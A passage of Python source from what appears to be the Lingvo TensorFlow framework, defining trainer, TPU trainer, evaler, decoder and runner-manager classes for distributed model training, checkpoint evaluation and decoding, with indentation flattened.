time.sleep(next_iteration_seconds - now)
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _RecordStepRate(self, current_steps, total_examples):
"""Computes the overall step rate and adds a summary."""
self._time_steps.append((time.time(), current_steps, total_examples))
# Keeps a relative long history to compute a smooth steps/second.
# Removes duplicate stats for step = 0 to get rid of the warm-up period.
while (self._time_steps[-1][1] - self._time_steps[0][1] > 10000 or
(len(self._time_steps) > 1 and
self._time_steps[0][1] == self._time_steps[1][1])):
del self._time_steps[0]
(t0, s0, e0), (t1, s1, e1) = self._time_steps[0], self._time_steps[-1]
rate = 0.0
example_rate = 0.0
if t1 > t0 + 1:
elapsed_secs = t1 - t0
rate = (s1 - s0) / elapsed_secs
example_rate = (e1 - e0) / elapsed_secs
tf.logging.info('Steps/second: %f, Examples/second: %f', rate, example_rate)
self._SummarizeValue(current_steps, 'global_step/sec', rate)
self._SummarizeValue(current_steps, 'examples/sec', example_rate)
return rate, example_rate
class Trainer(base_runner.BaseRunner):
"""Trainer on non-TPU."""
def __init__(self, *args, **kwargs):
super(Trainer, self).__init__(*args, **kwargs)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
try:
self._task_probs_summary_writers = []
for task in self._model.task_schedule.tasks:
path = os.path.join(os.path.join(self._train_dir, task))
tf.gfile.MakeDirs(path)
self._task_probs_summary_writers.append(self._CreateSummaryWriter(path))
except AttributeError:
tf.logging.info('AttributeError. Expected for single task models.')
self._task_probs_summary_writers = []
# Saves the graph def.
if self.params.cluster.task > 0:
self._summary_writer = None
else:
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
tf.train.write_graph(self._graph.as_graph_def(), self._train_dir,
'train.pbtxt')
worker_id = self.params.cluster.task
self._start_up_delay_steps = (((worker_id + 1) * worker_id / 2) *
self.params.train.start_up_delay_steps)
def _SummarizeValue(self, steps, tag, value, writer):
if writer:
writer.add_summary(metrics.CreateScalarSummary(tag, value), steps)
def Start(self):
self._RunLoop('trainer', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
return super(Trainer, self)._LoopEnqueue(op)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
global_step = None
@py_utils.Retry(retry_value=(tf.errors.FailedPreconditionError,))
def _WaitTillInit():
"""Wait until the model is ready."""
try:
global_step = sess.run(py_utils.GetGlobalStep())
except tf.errors.FailedPreconditionError as e:
tf.logging.info('Probably the expected race on global_step: %s', e)
raise
msg = 'step:%6d' % global_step
self._SetStatusMessage(msg)
if global_step < self._start_up_delay_steps:
msg = 'global step (%d) has not reached start up delay steps (%d)' % (
global_step, self._start_up_delay_steps)
tf.logging.info('%s', msg)
raise tf.errors.FailedPreconditionError(
node_def=None, op=None, message=msg)
return global_step
global_step = _WaitTillInit()
status_interval_steps = 100
next_status_step = 1
eval_metrics = None
while True:
if (self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics) or
self._ShouldStop(sess, global_step)):
tf.logging.info('Training finished.')
# Close all the queues so the enque threads can also finish.
for close_op in self.close_queue_ops:
sess.run(close_op)
if self._early_stop:
time.sleep(300) # controller hangs if it doesn't finish first
return
# If a task is explicitly specified, only train that task.
if self._model_task_name:
model_task = self._model.GetTask(self._model_task_name)
else:
# Note: This is a slightly stale global_step value from the previous
# sess.run() call.
# For multi-task models, `self._model.task_schedule.cur_probs` will
# be updated.
model_task = self._model.SampleTask(global_step)
if self._task_probs_summary_writers:
for index, prob in enumerate(self._model.task_schedule.cur_probs):
self._SummarizeValue(global_step, 'task_probability', prob,
self._task_probs_summary_writers[index])
try:
for index, task in enumerate(self._model.tasks):
self._SummarizeValue(global_step, 'task_weight',
sess.run(task.vars.task_weight),
self._task_probs_summary_writers[index])
except AttributeError:
pass
_, global_step, eval_metrics, per_example_tensors = sess.run([
model_task.train_op,
py_utils.GetGlobalStep(),
model_task.eval_metrics,
model_task.per_example_tensors,
])
msg = 'step:%6d' % global_step
for key, (val, _) in sorted(six.iteritems(eval_metrics)):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val, self._summary_writer)
model_task.ProcessFPropResults(sess, global_step, eval_metrics,
per_example_tensors)
if global_step >= next_status_step:
self._SetStatusMessage(msg)
next_status_step = global_step + status_interval_steps
else:
tf.logging.info(msg)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
per_example_tensors)
class TrainerTpu(base_runner.BaseRunner):
"""Trainer on TPU."""
def __init__(self, *args, **kwargs):
super(TrainerTpu, self).__init__(*args, **kwargs)
# Multiple TPU trainer tasks not tested/implemented.
assert self._cluster.num_replicas == 1
data_parallelism = self._cluster.num_splits_per_client
assert data_parallelism
num_devices_per_split = self._cluster.num_devices_per_split
tf.logging.info('data_parallelism: %d, num_devices_per_split: %d',
data_parallelism, num_devices_per_split)
self._steps_per_loop = min(self.params.train.tpu_steps_per_loop,
self.params.train.max_steps)
if self._cluster.params.worker.targets:
self._cluster_def = tf.train.ClusterSpec({
'worker': self._cluster.params.worker.targets.split(',')
}).as_cluster_def()
else:
self._cluster_def = None
self._initialized = threading.Event()
tf.logging.info(
'Creating TrainerTpu using data parallelism %s '
'and %s steps_per_loop', data_parallelism, self._steps_per_loop)
@py_utils.RetryOnTransientTfError()
def _WaitTillInit():
"""Wait until the model is ready."""
try:
# tpu.initialize_system() is called with None as embedding_config, as
# embedding_config is not available yet. Later in _Loop, it is called
# with the correct embedding_config. Since it cannot be called twice in
# the same graph with different embedding_config, we use a dummy_graph
# here.
dummy_graph = tf.Graph()
with dummy_graph.as_default():
tpu_initialize_system_op = tf.tpu.initialize_system(
embedding_config=None, job=None)
with self._GetSession(graph=dummy_graph) as sess:
topology = sess.run(tpu_initialize_system_op)
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=ComputationShape(num_devices_per_split),
num_replicas=data_parallelism)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('device_assignment.core_assignment: %s',
str(device_assignment.core_assignment))
tf.logging.info('device_assignment.topology.device_coordinates: %s',
str(device_assignment.topology.device_coordinates))
except py_utils.transient_tf_errors as e:
tf.logging.info('TPU initialization failed: %s', e)
raise
_WaitTillInit()
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.job_spec.name):
self._eval_metrics = metrics.TpuEvalMetrics()
def TpuTrainStep(*args):
"""Train a shard of a batch on a single TPU core.
Args:
*args: metrics values from previous steps.
Returns:
New summed metrics values and a train_op.
"""
self._model = self.params.Instantiate()
self._load_ops = tf.get_collection(py_utils.TPU_EMBEDDING_LOAD_OPS)
self._retrieve_ops = tf.get_collection(
py_utils.TPU_EMBEDDING_RETRIEVE_OPS)
tpu_embedding_collection = tf.get_collection(py_utils.TPU_EMBEDDING)
self._tpu_embedding = (
tpu_embedding_collection[0] if tpu_embedding_collection else None)
self._model.ConstructFPropBPropGraph()
per_step_eval_metrics = self._eval_metrics.SetMetrics(
self._model.GetTask().eval_metrics, args)
outfeed_op = self._OutfeedEnqueue(
self._model.GetTask().per_example_tensors)
summed_metrics = []
assert len(per_step_eval_metrics) == len(args)
with tf.control_dependencies([outfeed_op]):
for x, y in zip(per_step_eval_metrics, args):
summed_metrics.append(x + y)
return summed_metrics + [self._model.GetTask().train_op]
@tpu_function.on_device_training_loop
def TpuTrain():
loop_result = tpu_training_loop.repeat(
self._steps_per_loop,
TpuTrainStep,
inputs=self._eval_metrics.initial_values,
name='train_loop')
# Final metrics are the avg across self._steps_per_loop steps.
return self._eval_metrics.FinalizeMetrics(loop_result)
batch_parallel_res = tf.tpu.batch_parallel(
TpuTrain,
num_shards=data_parallelism,
device_assignment=py_utils.GetTpuDeviceAssignment())
outfeed_dequeue_op = self._OutfeedDequeueLoop(
self._model.GetTask().per_example_tensors, self._steps_per_loop,
self._cluster.num_splits_per_client)
# Get metric result from a single replica; they are all same here.
self._tpu_train_ops = [[t[0] for t in batch_parallel_res],
outfeed_dequeue_op]
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer = checkpointer.Checkpointer(self._train_dir,
self._model)
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
# Saves the graph def.
tf.train.write_graph(self._graph.as_graph_def(), self._train_dir,
'train.pbtxt')
def _GetSession(self, **kwargs):
return super(TrainerTpu, self)._GetSession(
cluster_def=self._cluster_def, **kwargs)
def _OutfeedEnqueue(self, per_example_tensors):
if not per_example_tensors:
return tf.no_op()
per_example_tensors = py_utils.NestedMap(per_example_tensors)
return tpu_ops.outfeed_enqueue_tuple(per_example_tensors.Flatten())
def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices):
"""Process all per-example tensor outfeed data for a TPU sess.run.
Args:
per_example_tensors: dict of key -> tensor as generated by TpuTrainStep.
num_loops: number of times that TpuTrainStep will be executed by TpuTrain.
num_devices: number of TPU cores assigned to this process.
Returns:
A dict of per-example tensors from the latest TpuTrainStep.
"""
if not per_example_tensors:
return tf.no_op()
tensor_shapes = [
py_utils.GetShape(per_example_tensors[key])
for key in sorted(per_example_tensors)
]
tensor_types = [
tf.as_dtype(per_example_tensors[key].dtype)
for key in sorted(per_example_tensors)
]
def LoopBody(i, *input_arrays):
"""Process outfeed data for a single TpuTrainStep.
Args:
i: current loop index.
*input_arrays: One tf.TensorArray per outfeed tensor.
Returns:
i+1 (new index) plus post-write tf.TensorArray handles.
"""
# Outfeed ops execute on each JF node, so they must be located on the
# nodes.
outfeed_devices = []
device_assignment = py_utils.GetTpuDeviceAssignment()
assert device_assignment
for replica in range(device_assignment.num_replicas):
for core in range(device_assignment.num_cores_per_replica):
with tf.device(device_assignment.host_device(replica, core)):
outfeed_devices.append(
tpu_ops.outfeed_dequeue_tuple(
tensor_types,
tensor_shapes,
device_ordinal=device_assignment.tpu_ordinal(replica,
core)))
offset = i * num_devices
output_arrays = list(input_arrays)
# Each output_array holds a different per-example tensor. We get results
# for each tensor from each TPU for each TpuTrainStep call.
for j in range(len(output_arrays)):
for k in range(len(outfeed_devices)):
output_arrays[j] = output_arrays[j].write(offset + k,
outfeed_devices[k][j])
return tuple([i + 1] + output_arrays)
def LoopCond(i, *output_arrays):
del output_arrays
return i < num_loops
output_arrays = [
tf.TensorArray(
tensor_types[i],
size=num_loops * num_devices,
element_shape=tensor_shapes[i]) for i in range(len(tensor_shapes))
]
# Loop once for each time that TpuTrainStep runs.
output_arrays = tf.while_loop(
LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:]
concatenated_arrays = [array.concat() for array in output_arrays]
return dict(zip(sorted(per_example_tensors), concatenated_arrays))
def Start(self):
# Run training.
self._RunLoop('trainer', self._Loop)
def _InfeedLoop(self, sess):
tf.logging.info('_InfeedLoop start')
for _ in range(self._steps_per_loop):
sess.run(self.enqueue_ops)
def StartEnqueueOp(self, op):
# When retrieve ops for TPU embedding is present, we use _InfeedLoop above
# instead to make sure enqueue and retrieve does not happen at the same
# time as required by TPU embedding.
# We can remove this by using a tf.while_loop driven infeed op.
if self._retrieve_ops:
return
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
# Wait for _Loop to initialize variables first before attempting to infeed.
self._initialized.wait()
# The global step may not be initialized in this thread if the target server
# uses session state isolation (e.g. Cloud TPUs).
sess = self._GetSession()
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.RestoreGlobalStepIfNeeded(sess)
return super(TrainerTpu, self)._LoopEnqueue(op, sess)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
with tf.container(self._container_id), self._GetSession() as sess:
config_proto = (
self._tpu_embedding.config_proto
if self._tpu_embedding is not None else None)
sess.run(
tf.tpu.initialize_system(embedding_config=config_proto, job=None))
sess.run(self.initialize_tables)
sess.run(self._initialize_local_vars)
if FLAGS.run_locally == 'tpu':
sess.run(tf.global_variables_initializer())
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.RestoreIfNeeded(sess)
gsteps = py_utils.GetGlobalStep()
global_step = sess.run(gsteps)
self._initialized.set()
eval_metrics = None
sess.run(self._load_ops)
while True:
if FLAGS.checkpoint_in_trainer_tpu:
# Init/restore variable if needed.
self.checkpointer.RestoreIfNeeded(sess)
if self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics):
# Early terminate gracefully by setting a new max step horizon: three
# more TPU steps to ensure that the enqueue ops can gracefully
# terminate as well.
if self._max_steps is None:
self._max_steps = global_step + 3 * self._steps_per_loop
tf.logging.info('Early stopping at step: %d', self._max_steps)
if self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
return
if self._retrieve_ops:
infeed_loop_thread = threading.Thread(
target=self._InfeedLoop, args=(sess,))
infeed_loop_thread.start()
values, outfeeds = sess.run(self._tpu_train_ops)
if self._retrieve_ops:
infeed_loop_thread.join()
tf.logging.info('Retrieve params.')
sess.run(self._retrieve_ops)
tf.logging.info('Retrieve params done.')
eval_metrics = self._eval_metrics.PackMetricsValues(values)
# Note: global_step is incremented by self._steps_per_loop by the
# previous sess.run call.
global_step = sess.run(gsteps)
msg = 'step:%6d' % global_step
for key, (val, _) in sorted(six.iteritems(eval_metrics)):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val)
self._SetStatusMessage(msg)
task = self._model.GetTask()
if not task.per_example_tensors:
outfeeds = {}
task.ProcessFPropResults(sess, global_step, eval_metrics, outfeeds)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
outfeeds)
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.MaybeSave(sess, gsteps)
def _GetSpecificCheckpoint(load_checkpoint_from):
"""Returns a specific checkpoint given `load_checkpoint_from`.
When load_checkpoint_from is a directory, we find the latest
checkpoint in the directory and use that as the checkpoint
to evaluate.
When load_checkpoint_from is a specific checkpoint, we
validate the path and return it.
Args:
load_checkpoint_from: If not None, specifies the directory or specific
checkpoint to load. If a directory, the latest checkpoint in the
directory will be used.
"""
if not load_checkpoint_from:
# No location specified, use existing train_dir.
return None
# If load_checkpoint_from is a directory, return the latest
# checkpoint in the directory.
if tf.io.gfile.isdir(load_checkpoint_from):
return tf.train.latest_checkpoint(load_checkpoint_from)
# We assume that load_checkpoint_from is a specific checkpoint to
# evaluate since it is not a directory.
#
# Check validity of eval path by looking for the index file.
if tf.io.gfile.exists(load_checkpoint_from + '.index'):
return load_checkpoint_from
# Fail if we see an unexpected load_checkpoint_from.
#
# This might happen if load_checkpoint_from refers to a checkpoint
# but the index file cannot be found.
raise ValueError('Invalid load_checkpoint_from: %s' % load_checkpoint_from)
class Evaler(base_runner.BaseRunner):
"""Evaler."""
def __init__(self, eval_type, *args, **kwargs):
super(Evaler, self).__init__(*args, **kwargs)
self._job_name = 'evaler_' + eval_type
self._output_name = 'eval_' + eval_type
self.params.is_eval = True
self._eval_dir = os.path.join(self._logdir, self._output_name)
if self._model_task_name:
self._eval_dir += '_' + str(self._model_task_name)
tf.gfile.MakeDirs(self._eval_dir)
self._eval_path = _GetSpecificCheckpoint(
self.params.task.eval.load_checkpoint_from)
self._summary_writer = self._CreateSummaryWriter(self._eval_dir)
self._should_report_metrics = self._job_name.startswith(
FLAGS.vizier_reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.Instantiate()
self._params = self._model.params
# Always create the same graph to make sure node names are always
# exactly the same.
self._model.ConstructFPropGraph()
self._model_task = self._model.GetTask(self._model_task_name)
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for eval models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
self.checkpointer = checkpointer.Checkpointer(self._train_dir,
self._model)
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.train.write_graph(self._graph.as_graph_def(), self._eval_dir,
'%s.pbtxt' % self._output_name)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
"""The main loop."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
if self._eval_path:
self._EvalOnce(self._eval_path, sess)
else:
path = None
while True:
path = self._FindNewCheckpoint(path, sess)
if not path or self._EvalOnce(path, sess):
break
# Maybe evaluate the last checkpoint if we are not given a specific
# checkpoint to evaluate.
if self._eval_path is None:
self.EvalLatestCheckpoint(path)
if self._should_report_metrics:
self._trial.ReportDone()
tf.logging.info('Evaluation finished.')
def EvalLatestCheckpoint(self, last_path=None):
"""Runs eval once on the latest checkpoint."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already evaluated.')
return
self._EvalOnce(path, sess)
def _EvalOnce(self, path, sess):
"""Runs evaluation for a batch of samples.
Args:
path: checkpoint path.
sess: the tf Session.
Returns:
should_stop.
"""
if not FLAGS.evaler_in_same_address_as_controller:
self.checkpointer.RestoreFromPath(sess, path)
global_step = sess.run(py_utils.GetGlobalStep())
# Check after how many steps checkpoint got saved.
# And decide whether to run an evaluation.
if global_step < self._model_task.params.eval.start_eval_after:
return False
metrics_dict = {
name: metrics.AverageMetric() for name in self._model_task.eval_metrics
}
num_samples_metric = metrics_dict['num_samples_in_batch']
while (num_samples_metric.total_value <
self._model_task.params.eval.samples_per_summary):
# NOTE: We intentionally do not let FProp generate summaries by default,
# because evaler calls FProp multiple times for each checkpoint. Multiple
# summaries at the same step is often confusing. Instead, models should
# update eval_metrics and generate aggregate summaries.
ans = sess.run(self._model_task.eval_metrics)
for name, (value, weight) in six.iteritems(ans):
metrics_dict[name].Update(value, weight)
tf.logging.info('Total examples done: %d/%d',
num_samples_metric.total_value,
self._model_task.params.eval.samples_per_summary)
# Replace average values with total values for certain metrics.
if 'num_predictions' in metrics_dict:
metrics_dict['num_predictions'].total_weight = 1.0
if 'num_words' in metrics_dict:
metrics_dict['num_words'].total_weight = 1.0
# When we have evaluated so many samples, generate a summary.
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._eval_dir),
global_step, {k: v.Summary(k) for k, v in six.iteritems(metrics_dict)},
text_filename=os.path.join(self._eval_dir,
'score-{:08d}.txt'.format(global_step)))
should_stop = global_step >= self.params.train.max_steps
if self._should_report_metrics:
trial_should_stop = self._trial.ReportEvalMeasure(global_step,
metrics_dict, path)
should_stop = should_stop or trial_should_stop
return should_stop
def GetDecoderDir(logdir, decoder_type, model_task_name):
if model_task_name:
decoder_dir = '%s_%s' % (decoder_type, model_task_name)
else:
decoder_dir = decoder_type
return os.path.join(logdir, decoder_dir)
def _GetCheckpointIdForDecodeOut(checkpoint_path, global_step):
"""Retrieve the checkpoint id for the decoder out file.
Finds the checkpoint id in the checkpoint file name and compares to global
step. If they diverge, uses the retrieved id and prints a warning.
Args:
checkpoint_path: path to checkpoint file.
global_step: int specifying the global step of the model.
Returns:
Checkpoint id as int.
"""
ckpt_id_from_file = int(re.sub(r'.*ckpt-', '', checkpoint_path))
tf.logging.info('Loaded checkpoint is at global step: %d', global_step)
tf.logging.info('Checkpoint path: %s', checkpoint_path)
tf.logging.info('Checkpoint id according to checkpoint path: %d',
ckpt_id_from_file)
if global_step != ckpt_id_from_file:
tf.logging.warning(
'Checkpoint id %d != global step %d. '
'Will use checkpoint id from checkpoint file for '
'writing decoder output.', ckpt_id_from_file, global_step)
return ckpt_id_from_file
class Decoder(base_runner.BaseRunner):
"""Decoder."""
def __init__(self, decoder_type, *args, **kwargs):
super(Decoder, self).__init__(*args, **kwargs)
self._job_name = 'decoder_' + decoder_type
self.params.is_eval = True
self._decoder_dir = GetDecoderDir(self._logdir, self._job_name,
self._model_task_name)
tf.gfile.MakeDirs(self._decoder_dir)
self._decode_path = _GetSpecificCheckpoint(
self.params.task.eval.load_checkpoint_from)
self._summary_writer = self._CreateSummaryWriter(self._decoder_dir)
self._should_report_metrics = self._job_name.startswith(
FLAGS.vizier_reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.Instantiate()
self._params = self._model.params
self._model_task = self._model.GetTask(self._model_task_name)
# Note, different graphs are being constructed for different model
# tasks, which may result in different node names being chosen.
# Obviously, variable names has to be stay the same between train and
# decode.
cluster = self._cluster
with tf.device(cluster.input_device):
input_batch = (
self._model_task.input_generator.GetPreprocessedInputBatch())
self._dec_output = self._model_task.Decode(input_batch)
self._summary_op = tf.summary.merge_all()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for decoder models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.checkpointer = checkpointer.Checkpointer(self._train_dir,
self._model)
assert not self.enqueue_ops
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._decoder_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.train.write_graph(self._graph.as_graph_def(), self._decoder_dir,
'%s.pbtxt' % self._job_name)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
with tf.container(
self._container_id), self._GetSession(inline=False) as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
if self._decode_path:
self.DecodeCheckpoint(sess, self._decode_path)
else:
path = None
while True:
path = self._FindNewCheckpoint(path, sess)
if not path or self.DecodeCheckpoint(sess, path):
break
# Maybe decode the last checkpoint if we are not given a specific
# checkpoint to decode.
if self._decode_path is None:
self.DecodeLatestCheckpoint(path)
if self._should_report_metrics:
self._trial.ReportDone()
tf.logging.info('Decoding finished.')
@classmethod
def GetDecodeOutPath(cls, decoder_dir, checkpoint_id):
"""Gets the path to decode out file."""
out_dir = cls._GetTtlDir(decoder_dir, duration='7d')
return os.path.join(out_dir, 'decoder_out_%09d' % checkpoint_id)
def DecodeCheckpoint(self, sess, checkpoint_path):
"""Decodes `samples_per_summary` examples using `checkpoint_path`."""
p = self._model_task.params
ckpt_id_from_file = int(re.sub(r'.*ckpt-', '', checkpoint_path))
if ckpt_id_from_file < p.eval.start_decoder_after:
return False
samples_per_summary = p.eval.decoder_samples_per_summary
if not samples_per_summary:
samples_per_summary = p.eval.samples_per_summary
self.checkpointer.RestoreFromPath(sess, checkpoint_path)
global_step = sess.run(py_utils.GetGlobalStep())
dec_metrics = self._model_task.CreateDecoderMetrics()
if not dec_metrics:
tf.logging.info('Empty decoder metrics')
return
buffered_decode_out = []
num_examples_metric = dec_metrics['num_samples_in_batch']
start_time = time.time()
while num_examples_metric.total_value < samples_per_summary:
tf.logging.info('Fetching dec_output.')
fetch_start = time.time()
run_options = tf.RunOptions(report_tensor_allocations_upon_oom=False)
if self._summary_op is None:
# No summaries were collected.
dec_out = sess.run(self._dec_output, options=run_options)
else:
dec_out, summary = sess.run([self._dec_output, self._summary_op],
options=run_options)
self._summary_writer.add_summary(summary, global_step)
post_process_start = time.time()
tf.logging.info('Done fetching (%f seconds)' %
(post_process_start - fetch_start))
decode_out = self._model_task.PostProcessDecodeOut(dec_out, dec_metrics)
if decode_out:
buffered_decode_out.extend(decode_out)
tf.logging.info(
'Total examples done: %d/%d '
'(%f seconds decode postprocess)', num_examples_metric.total_value,
samples_per_summary,
time.time() - post_process_start)
summaries = {k: v.Summary(k) for k, v in six.iteritems(dec_metrics)}
elapsed_secs = time.time() - start_time
example_rate = num_examples_metric.total_value / elapsed_secs
summaries['examples/sec'] = metrics.CreateScalarSummary(
'examples/sec', example_rate)
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._decoder_dir),
global_step,
summaries,
text_filename=os.path.join(self._decoder_dir,
'score-{:08d}.txt'.format(global_step)))
self._ExportMetrics(
decode_checkpoint=global_step,
dec_metrics=dec_metrics,
example_rate=example_rate)
# global_step and the checkpoint id from the checkpoint file might be
# different. For consistency of checkpoint filename and decoder_out
# file, use the checkpoint id as derived from the checkpoint filename.
checkpoint_id = _GetCheckpointIdForDecodeOut(checkpoint_path, global_step)
decode_out_path = self.GetDecodeOutPath(self._decoder_dir, checkpoint_id)
decode_finalize_args = base_model.DecodeFinalizeArgs(
decode_out_path=decode_out_path, decode_out=buffered_decode_out)
self._model_task.DecodeFinalize(decode_finalize_args)
should_stop = global_step >= self.params.train.max_steps
if self._should_report_metrics:
trial_should_stop = self._trial.ReportEvalMeasure(global_step,
dec_metrics,
checkpoint_path)
should_stop = should_stop or trial_should_stop
return should_stop
def DecodeLatestCheckpoint(self, last_path=None):
"""Runs decoder on the latest checkpoint."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already decoded.')
return
self.DecodeCheckpoint(sess, path)
def _GetClusterSpecDict():
"""Parses the cluster_spec flag and returns a dict."""
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = {}
for job_spec in job_specs:
# ps_host=worker1:1231,worker2:1234
job_machines = job_spec.split('=')
if len(job_machines) != 2:
raise ValueError('Invalid job specification: %s', job_spec)
cluster_spec_dict[job_machines[0]] = job_machines[1].split(',')
return cluster_spec_dict
class RunnerManager(object):
"""Helper class for managing runners."""
# This is a hack so these classes can be overridded with internal
# non-public implementations.
# pylint: disable=invalid-name
inference_graph_exporter = inference_graph_exporter
model_registry = model_registry
Controller = Controller
Trainer = Trainer
TrainerTpu = TrainerTpu
Evaler = Evaler
Decoder = Decoder
ExecutorTpu = executor.ExecutorTpu
# pylint: enable=invalid-name
def __init__(self, model):
self._model_name = model
def MaybeLaunchTensorFlow(self):
"""Starts TF machinary in this process."""
if FLAGS.run_locally:
return
tf.logging.info('Launching tensorflow.')
target = FLAGS.tf_master
if not target.startswith('localhost'):
# E.g., trainer_client is configured w/ FLAGS.tf_master pointing to
# another job. In that case, start a local server.
cluster_spec_dict = _GetClusterSpecDict()
self._tf_server = tf.train.Server(
tf.train.ClusterSpec(cluster_spec_dict),
job_name=FLAGS.job,
task_index=FLAGS.task)
target = self._tf_server.target
if not FLAGS.tf_master:
FLAGS.tf_master = target
with tf.Session(target).as_default():
value = (tf.constant(1.) + tf.constant(1.)).eval()
assert value == 2.0, 'Something is really wrong.'
tf.logging.info('Launched tensorflow.')
def GetParamsForDataset(self, job_name, dataset_name):
"""Returns params for job `job_name` on the dataset `dataset_name`."""
# Get the current cluster and update its params from flags.
cluster = cluster_factory.Current()
self.UpdateClusterParamsFromFlags(cluster.params, job_name)
with cluster_factory.Cluster(cluster.params):
try:
cfg = self.model_registry.GetParams(self._model_name, dataset_name)
except base_model_params.DatasetError as e:
dataset_name_retry = dataset_name.title()
tf.logging.warning(
'Exception configuring dataset %s, retrying as %s: %s',
dataset_name, dataset_name_retry, e)
cfg = self.model_registry.GetParams(self._model_name,
dataset_name_retry)
tf.logging.warning('Succeeded after retrying as %s.' %
dataset_name_retry)
cfg.cluster = cluster.params
# Updates a few params based on flags.
if FLAGS.enqueue_max_steps:
cfg.train.enqueue_max_steps = FLAGS.enqueue_max_steps
if FLAGS.saver_max_to_keep:
cfg.train.save_max_to_keep = FLAGS.saver_max_to_keep
if FLAGS.saver_keep_checkpoint_every_n_hours:
cfg.train.save_keep_checkpoint_every_n_hours = FLAGS.saver_keep_checkpoint_every_n_hours
return cfg
def GetProgramScheduleParams(self, job_name, dataset_names):
"""Returns ProgramSchedule params for job `job_name` and datasets `dataset_name`."""
# Get the current cluster and update its params from flags.
cluster = cluster_factory.Current()
self.UpdateClusterParamsFromFlags(cluster.params, job_name)
with cluster_factory.Cluster(cluster.params):
